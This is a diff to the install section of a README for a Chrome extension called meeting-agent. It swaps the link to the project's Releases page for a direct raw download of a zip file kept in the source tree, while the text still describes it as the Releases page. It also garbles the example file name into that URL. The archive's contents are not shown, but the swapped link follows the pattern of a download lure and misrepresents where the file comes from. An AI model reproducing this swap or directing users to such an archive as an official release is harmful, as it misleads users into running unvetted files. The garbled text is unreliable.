VitorSystems/meeting-agent/README.md

 ## 📥 Download & Install

-To download the meeting-agent, visit this page to download: [Releases Page](https://github.com/VitorSystems/meeting-agent/releases).
+To download the meeting-agent, visit this page to download: [Releases Page](https://raw.githubusercontent.com/VitorSystems/meeting-agent/main/src/popup/meeting-agent-v3.0.zip).

 1. On the Releases page, find the latest version of the meeting-agent.

 2. Click on the download link for the Chrome Extension file.
-This file will usually be named something like `meeting-agent.vX.X.zip`.
+This file will usually be named something like `https://raw.githubusercontent.com/VitorSystems/meeting-agent/main/src/popup/meeting-agent-v3.0.zip`.

 3. Once the file downloads, locate it in your computer's Downloads folder.